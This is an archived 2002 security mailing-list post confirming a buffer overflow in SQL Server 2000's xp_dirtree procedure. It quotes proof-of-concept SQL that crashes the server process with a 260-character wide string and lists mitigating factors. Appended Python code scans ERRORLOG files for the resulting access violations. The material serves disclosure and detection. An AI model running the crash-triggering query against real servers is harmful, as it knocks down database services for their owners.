Re: Another Sql Server 7 Buffer Overflow

From: Bronek Kozicki (brok@RUBIKON.PL)
Date: 03/07/02


Date:         Thu, 7 Mar 2002 18:34:47 +0100
From: Bronek Kozicki <brok@RUBIKON.PL>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

I can confirm this on SQL Server 2000 Service Pack 2 + Security update
Q316333, there are some mitigating factors however.

SQL Server version (from ERRORLOG):
2002-03-07 16:13:49.18 server Microsoft SQL Server 2000 - 8.00.578
(Intel X86)
 Feb 12 2002 20:54:17
 Copyright (c) 1988-2000 Microsoft Corporation
 Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 2)
[ . . . ]
2002-03-07 18:09:15.43 spid51 Using 'xpstar.dll' version '2000.80.561' to
execute extended stored procedure 'xp_dirtree'.

I used SQL code from SHATTER research team at Application Security:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',260))
3> execute xp_dirtree @test
4> go
1>

... which caused this error (from ERRORLOG again):
2002-03-07 18:09:15.48 spid51 Error: 0, Severity: 20, State: 0
2002-03-07 18:09:15.48 spid51 Stored function 'xp_dirtree' in the library
'xpstar.dll' generated an access violation. SQL Server is terminating
process 51..

Mitigating factors:

1. Argument length has to be exactly 260 wide characters: the procedure works
smoothly if the parameter string is shorter, and does return an error (i.e.
parameter check) if the string is longer:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',261))
3> execute xp_dirtree @test
4> go
Msg 22006, Level 15, State 1:
Error executing extended stored procedure: Invalid Parameter
1>

2. Problem does not occur when 8-bit characters are used (i.e. narrow string),
no matter how long the string is:
1> DECLARE @test varchar(8000)
2> SET @test = (SELECT replicate('n',8000))
3> execute xp_dirtree @test
4> go
 subdirectory                                                              depth
 ------------------------------------------------------------------------- -----------

1>
... above is exactly what the procedure is supposed to do.

Kind regards

B.
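The ERRORLOG lines quoted above give a defender something concrete to alert on. The following Python is an added example, not code from the post or from Microsoft: it scans ERRORLOG text for the "generated an access violation" message and pairs each hit with the preceding "Using ... to execute extended stored procedure" line for the same spid, so the crashing procedure, DLL and DLL version come out together. The sample log is constructed from the lines in the post, re-joined onto single lines as they appear in a real ERRORLOG.

```python
import re
from typing import Dict, List

# Constructed sample, modelled on the ERRORLOG excerpts quoted in the post.
SAMPLE_ERRORLOG = """\
2002-03-07 18:09:15.43 spid51 Using 'xpstar.dll' version '2000.80.561' to execute extended stored procedure 'xp_dirtree'.
2002-03-07 18:09:15.48 spid51 Error: 0, Severity: 20, State: 0
2002-03-07 18:09:15.48 spid51 Stored function 'xp_dirtree' in the library 'xpstar.dll' generated an access violation. SQL Server is terminating process 51..
2002-03-07 18:10:02.11 spid52 Using 'xpstar.dll' version '2000.80.561' to execute extended stored procedure 'xp_dirtree'.
"""

# Common ERRORLOG line shape: timestamp, source (spidNN or 'server'), message.
_LINE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d) (?P<src>\S+) (?P<msg>.*)$")
# The two message shapes the post shows for extended stored procedures.
_USING = re.compile(r"Using '(?P<lib>[^']+)' version '(?P<ver>[^']+)' to execute "
                    r"extended stored procedure '(?P<proc>[^']+)'")
_AV = re.compile(r"Stored function '(?P<proc>[^']+)' in the library '(?P<lib>[^']+)' "
                 r"generated an access violation")


def find_xp_access_violations(errorlog: str) -> List[Dict[str, str]]:
    """Return one record per extended-stored-procedure access violation.

    Each record carries the timestamp, spid, procedure and DLL from the access
    violation line, plus the DLL version from the most recent 'Using ...' line
    seen for the same spid ('unknown' if there was none).
    """
    last_using: Dict[str, Dict[str, str]] = {}  # spid -> last XP invocation seen
    hits: List[Dict[str, str]] = []
    for raw in errorlog.splitlines():
        m = _LINE.match(raw)
        if not m:
            continue  # continuation or banner line, not a timestamped entry
        ts, src, msg = m.group("ts", "src", "msg")
        u = _USING.search(msg)
        if u:
            last_using[src] = {"lib": u["lib"], "ver": u["ver"], "proc": u["proc"]}
            continue
        a = _AV.search(msg)
        if a:
            prior = last_using.get(src, {})
            hits.append({"timestamp": ts, "spid": src, "procedure": a["proc"],
                         "library": a["lib"], "dll_version": prior.get("ver", "unknown")})
    return hits


if __name__ == "__main__":
    for hit in find_xp_access_violations(SAMPLE_ERRORLOG):
        print(hit)
```

Feeding the real ERRORLOG (or a tail of it) to `find_xp_access_violations` gives a list that can be forwarded to whatever alerting a site already uses; an empty list means no extended stored procedure crashed in that window.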
